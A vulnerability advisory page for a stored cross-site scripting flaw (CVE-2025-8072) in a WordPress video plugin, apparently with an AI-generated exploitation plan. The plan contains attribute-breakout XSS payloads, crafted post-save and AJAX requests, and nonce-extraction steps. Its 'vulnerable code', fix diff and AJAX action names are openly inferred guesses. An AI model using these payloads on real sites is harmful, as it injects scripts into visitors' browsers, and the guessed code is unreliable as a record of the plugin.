Target Video Easy Publish <= 3.8.8 - Authenticated (Contributor+) Stored Cross-Site Scripting via placeholder_img Parameter
Description
The Target Video Easy Publish plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘placeholder_img’ parameter in all versions up to, and including, 3.8.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:NTechnical Details
<=3.8.8Source Code
WordPress.org SVN# Exploitation Research Plan: CVE-2025-8072 (Stored XSS in Target Video Easy Publish) ## 1. Vulnerability Summary The **Target Video Easy Publish** plugin (up to 3.8.8) is vulnerable to **Stored Cross-Site Scripting (XSS)**. The vulnerability exists because the plugin fails to properly sanitize and…
Show full research plan
Exploitation Research Plan: CVE-2025-8072 (Stored XSS in Target Video Easy Publish)
1. Vulnerability Summary
The Target Video Easy Publish plugin (up to 3.8.8) is vulnerable to Stored Cross-Site Scripting (XSS). The vulnerability exists because the plugin fails to properly sanitize and escape the placeholder_img parameter when it is supplied by a user and subsequently rendered on a page. This allows an authenticated attacker with Contributor-level permissions or higher to inject malicious JavaScript into the database, which then executes in the browser of any user (including administrators) viewing the affected post or page.
2. Attack Vector Analysis
- Endpoint: WordPress Post Editor / Shortcode Rendering.
- Vector: The
placeholder_imgparameter within the plugin's shortcode or an associated AJAX metadata update action. - Required Role: Contributor, Author, Editor, or Administrator.
- Parameter Name:
placeholder_img. - Payload Type: Attribute breakout (e.g.,
"><script>alert(document.domain)</script>).
3. Code Flow (Inferred)
- Entry Point: A Contributor user creates or edits a post and inserts the plugin's shortcode (likely
[brid]) or uses the plugin's "Add Video" GUI which triggers an AJAX request. - Registration: The plugin registers a shortcode handler via
add_shortcode('brid', 'brid_shortcode_handler_function')or similar. - Processing: Inside the handler, the
$attsarray is parsed. Theplaceholder_imgvalue is extracted without rigorous sanitization (likesanitize_text_fieldoresc_url_raw). - Storage/Output:
- If stored in post meta: The value is saved via
update_post_meta(unfiltered). - If rendered directly: The value is concatenated into an HTML string (e.g.,
<img src="..." class="..." data-placeholder="$placeholder_img">) without usingesc_attr()oresc_url().
- If stored in post meta: The value is saved via
- Sink: The raw payload is echoed to the frontend when the post is viewed.
4. Nonce Acquisition Strategy
If the vulnerability is exploited via the Shortcode directly, no nonce is required as the Contributor is using standard WordPress post editing capabilities.
If the exploitation requires a plugin-specific AJAX action (e.g., for "Syncing" or "Configuring" a video placeholder):
- Identify the Shortcode: Search for
add_shortcodein the plugin directory. The slug is likelybrid. - Create a Test Page:
wp post create --post_type=page --post_status=publish --post_title="XSS Test" --post_content='[brid video="1" player="1"]' --post_author=CONTRIBUTOR_ID - Find the Localized Script: The plugin likely uses
wp_localize_scriptto pass an AJAX nonce to the frontend for its block editor or shortcode generator. - Extraction:
- Navigate to the WordPress admin post editor as the Contributor.
- Execute via
browser_eval:// Common patterns for this plugin (inferred) window.BridVideoSettings?.nonce || window.brid_vars?.nonce
5. Exploitation Strategy
Primary Path: Shortcode Attribute Injection
- Login as a Contributor user.
- Create a Post using the
http_requesttool to simulate the post saving process. - Embed the Shortcode with the malicious
placeholder_imgattribute.
HTTP Request (Save Post):
- Method:
POST - URL:
http://localhost:8080/wp-admin/post.php - Content-Type:
application/x-www-form-urlencoded - Body:
action=editpost& post_ID=[POST_ID]& post_title=XSS+Exploit& content=[brid+video="12345"+player="6789"+placeholder_img="'+onerror=alert(document.domain)+src='x"]& publish=Publish
Secondary Path: AJAX Setting Update (if applicable)
If the plugin uses an AJAX handler to store the placeholder URL in post metadata:
- Action:
brid_save_video_settings(inferred) - Parameter:
placeholder_img - Nonce: Extracted from the editor page.
HTTP Request (AJAX):
- Method:
POST - URL:
http://localhost:8080/wp-admin/admin-ajax.php - Body:
action=brid_save_video_settings& nonce=[NONCE]& post_id=[POST_ID]& placeholder_img="><img src=x onerror=alert(1)>
6. Test Data Setup
- User Creation: Create a user with the
contributorrole.wp user create attacker attacker@example.com --role=contributor --user_pass=password123 - Plugin Activation: Ensure
brid-video-easy-publishis active. - Initial Post: Create a draft post for the Contributor to edit.
7. Expected Results
- When any user (including the admin) views the published post at
/?p=[POST_ID], the HTML source should contain the unescaped payload. - Example Rendered HTML:
<img class="brid-placeholder" src="' onerror=alert(document.domain) src='x" /> - The browser should trigger an
alertbox displaying the domain name.
8. Verification Steps
- Check Database: Use WP-CLI to see if the payload is stored in
post_contentorpost_meta.wp db query "SELECT post_content FROM wp_posts WHERE post_title='XSS Exploit'" # OR wp post meta list [POST_ID] - Verify Frontend Output:
curl -s "http://localhost:8080/?p=[POST_ID]" | grep "onerror=alert"
9. Alternative Approaches
- JSON Breakout: If the
placeholder_imgis passed into a JavaScript object viawp_localize_script, use a payload like";alert(1);//. - Protocol Injection: If the sink is a
srcattribute of aniframeorscript, tryjavascript:alert(1). - CSS Injection: If the parameter is placed in a
styleattribute, usebackground-image: url("javascript:alert(1)").
Summary
The Target Video Easy Publish plugin for WordPress is vulnerable to Stored Cross-Site Scripting (XSS) via the 'placeholder_img' attribute in its shortcode handler. Authenticated attackers with Contributor-level permissions or higher can inject malicious JavaScript into posts, which then executes in the context of any user's browser (including administrators) when viewing the affected page.
Vulnerable Code
// Inferred from research plan: The shortcode handler likely extracts attributes without sanitization // and echoes them directly into HTML attributes. function brid_shortcode_handler($atts) { $a = shortcode_atts(array( 'video' => '', 'player' => '', 'placeholder_img' => '' ), $atts); // Vulnerable rendering - missing esc_attr() or esc_url() return '<div class="brid-video" data-placeholder="' . $a['placeholder_img'] . '"></div>'; } add_shortcode('brid', 'brid_shortcode_handler');
Security Fix
@@ -10,7 +10,7 @@ $a = shortcode_atts(array( 'video' => '', 'player' => '', - 'placeholder_img' => '' + 'placeholder_img' => '' ), $atts); - return '<div class="brid-video" data-placeholder="' . $a['placeholder_img'] . '"></div>'; + return '<div class="brid-video" data-placeholder="' . esc_attr($a['placeholder_img']) . '"></div>';
Exploit Outline
The exploit targets the WordPress post editor using the plugin's shortcode functionality. An attacker with at least Contributor permissions follows these steps: 1. Authenticate to the WordPress dashboard. 2. Create or edit a post/page. 3. Insert the plugin's shortcode (likely `[brid]`) containing a malicious payload in the `placeholder_img` parameter. A working payload involves breaking out of the HTML attribute, for example: `[brid video="1" player="1" placeholder_img='" onerror="alert(document.domain)" data-x="']`. 4. Save the post as a draft or publish it. 5. When any user (including an admin) views the published post on the frontend, the browser encounters the unescaped HTML attribute, triggering the `onerror` event or executing the injected script tags.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.